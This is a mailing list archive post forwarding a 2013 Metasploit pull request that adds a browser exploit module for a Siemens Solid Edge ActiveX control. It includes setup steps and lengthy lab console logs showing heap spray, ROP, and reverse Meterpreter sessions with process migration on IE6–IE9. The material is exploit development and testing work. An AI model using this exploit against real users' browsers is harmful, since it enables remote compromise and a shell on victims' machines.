Metasploit mailing list archives
Fwd: [metasploit-framework] Add module for OSVDB 93696 (#2444)
From: Tod Beardsley <todb () metasploit com>
Date: Tue, 1 Oct 2013 12:12:50 -0500
Best exploit pull request ever. Description of, pointer to, and help offered with, vulnerable software installation, verification steps, and screens of alternative exploit scenarios in action. Thanks Juan! I'll want to work this into the documentation on "How to PR against Metasploit" some day soon. ---------- Forwarded message ---------- From: Juan Vazquez <notifications () github com> Date: Tue, Oct 1, 2013 at 11:52 AM Subject: [metasploit-framework] Add module for OSVDB 93696 (#2444) To: rapid7/metasploit-framework <metasploit-framework () noreply github com>
From the original advisory the software can be located:
http://www.exploit-db.com/exploits/25712/ software description: http://en.wikipedia.org/wiki/Solid_Edge vendor site: http://www.siemens.com/entry/cc/en/ download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm file tested: SolidEdgeV104ENGLISH_32Bit.exe Downloaded some time ago, don't know if the installer is available still. email me if you need the installer and it isn't available on the vendor site anymore. In order to test - Install as much combinations as you would like to test of Windows XPSP3, Vista, 7SP1 / IE6-IE9 / SolidEdgeV104ENGLISH_32Bit.exe - Verify versions of the targeted components: Jutil.dll 104.0.0.82 and SEListCtrlX 104.0.0.82 - Start msfconsole, select the module and run the exploit - In the browser, go to the link provided by the module. It should provide shell. It is using Heap Spray so expect some fails from time to time. But the module should be reliable enough. - [] If you would like to verify javascript OBFUSCATION for the heap spray "set OBFUSCATE true" on the msfconsole once the exploit has been selected, before exploit. Testing examples (IE6 to IE9 on XP SP3 and 7 SP1) : *IE6 / Windows XP SP3* msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 6 on Windows XP SP3 [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using payload without ROP... [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 10.6.0.165 [*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:49707) at 2013-10-01 10:06:17 -0500 [*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:49707) processing InitialAutoRunScript 'migrate -f' [*] Current server process: IEXPLORE.EXE (1692) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3564 [+] Successfully migrated to process msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: JUAN-C0DE875735\Administrator meterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 10.6.0.165 - Meterpreter session 1 closed. Reason: User exit *IE 7 / Windows XP SP3* msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 7 on Windows XP SP3 [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using payload without ROP... [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 10.6.0.165 [*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:49921) at 2013-10-01 10:16:26 -0500 [*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:49921) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1056) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3664 [+] Successfully migrated to process msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: JUAN-C0DE875735\Administrator meterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 10.6.0.165 - Meterpreter session 3 closed. Reason: User exit - with obfuscation msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Requesting: /581APDrO [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Target selected as: IE 7 on Windows XP SP3 [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Using payload without ROP... [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 172.16.240.1 [*] Meterpreter session 6 opened (172.16.240.1:4444 -> 172.16.240.1:50605) at 2013-10-01 11:40:20 -0500 [*] Session ID 6 (172.16.240.1:4444 -> 172.16.240.1:50605) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1340) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2440 [+] Successfully migrated to process *IE 8 / Windows XP SP3* msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /CyzchAko9Lj0 [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows XP SP3 [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using msvcrt ROP [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 10.6.0.165 [*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:50169) at 2013-10-01 10:56:24 -0500 [*] Session ID 4 (10.6.0.165:4444 -> 10.6.0.165:50169) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2732) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1764 msf exploit(siemens_solid_edge_selistctrlx) > sessi[+] Successfully migrated to process ons -i 4 [*] Starting interaction with 4... meterpreter > getuid Server username: JUAN-C0DE875735\Administrator smeterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 10.6.0.165 - Meterpreter session 4 closed. Reason: User exit - with obfuscation msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Requesting: /581APDrO [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows XP SP3 [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Using msvcrt ROP [*] 172.16.240.1 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 172.16.240.1 [*] Meterpreter session 5 opened (172.16.240.1:4444 -> 172.16.240.1:50596) at 2013-10-01 11:36:57 -0500 [*] Session ID 5 (172.16.240.1:4444 -> 172.16.240.1:50596) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2960) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3400 [+] Successfully migrated to process msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 5 [*] Starting interaction with 5... meterpreter > getuid Server username: JUAN-C0DE875735\Administrator meterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 172.16.240.1 - Meterpreter session 5 closed. Reason: User exit *IE8 / Windows 7 SP1* msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /QGQFAoQKQPfO [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows 7 [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically... [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 10.6.0.165 [*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50519) at 2013-10-01 11:21:05 -0500 [*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:50519) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3888) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1000 msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getui[+] Successfully migrated to process d Server username: WIN-RNJ7NBRK9L7\Juan Vazquez meterpreter > sysinfo Computer : WIN-RNJ7NBRK9L7 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.172.140 - Meterpreter session 1 closed. Reason: User exit - with obfuscation msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true OBFUSCATE => true msf exploit(siemens_solid_edge_selistctrlx) > rexploit [*] Stopping existing job... [*] Reloading module... [*] Exploit running as background job. [*] Started reverse handler on 10.6.0.165:4444 [*] Using URL: http://0.0.0.0:8080/Bqg4d70LeyFC [*] Local IP: http://10.6.0.165:8080/Bqg4d70LeyFC [*] Server started. msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /Bqg4d70LeyFC [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows 7 [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically... [*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 10.6.0.165 [*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50583) at 2013-10-01 11:29:29 -0500 [*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:50583) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2416) [*] Spawning notepad.exe process to migrate to [+] Migrating to 156 [+] Successfully migrated to process *IE9 / Windows 7 SP1* msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /y1qz89a [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7 [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically... [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML... [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /y1qz89a [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7 [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically... [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 172.16.240.142 [*] Meterpreter session 3 opened (172.16.240.1:4444 -> 172.16.240.142:49159) at 2013-10-01 11:32:21 -0500 [*] Session ID 3 (172.16.240.1:4444 -> 172.16.240.142:49159) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3200) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3700 [+] Successfully migrated to process msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: WIN-RNJ7NBRK9L7\Juan Vazquez meterpreter > sysinfo eComputer : WIN-RNJ7NBRK9L7 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 172.16.240.142 - Meterpreter session 3 closed. Reason: User exit - with obfuscation msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true OBFUSCATE => true msf exploit(siemens_solid_edge_selistctrlx) > rexploit [*] Stopping existing job... [*] Reloading module... [*] Exploit running as background job. [*] Started reverse handler on 172.16.240.1:4444 [*] Using URL: http://172.16.240.1:8080/581APDrO [*] Server started. msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /581APDrO [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7 [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically... [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML... [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /581APDrO [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7 [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically... [*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML... [*] Sending stage (770048 bytes) to 172.16.240.142 [*] Meterpreter session 4 opened (172.16.240.1:4444 -> 172.16.240.142:49162) at 2013-10-01 11:34:18 -0500 [*] Session ID 4 (172.16.240.1:4444 -> 172.16.240.142:49162) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (604) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3188 [+] Successfully migrated to process ------------------------------ You can merge this Pull Request by running git pull https://github.com/jvazquez-r7/metasploit-framework osvdb_93696 Or view, comment on, or merge it at: https://github.com/rapid7/metasploit-framework/pull/2444 Commit Summary - Add module for OSVDB 93696 File Changes - *A* modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb<https://github.com/rapid7/metasploit-framework/pull/2444/files#diff-0>(500) Patch Links: - https://github.com/rapid7/metasploit-framework/pull/2444.patch - https://github.com/rapid7/metasploit-framework/pull/2444.diff
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Fwd: [metasploit-framework] Add module for OSVDB 93696 (#2444) Tod Beardsley (Oct 01)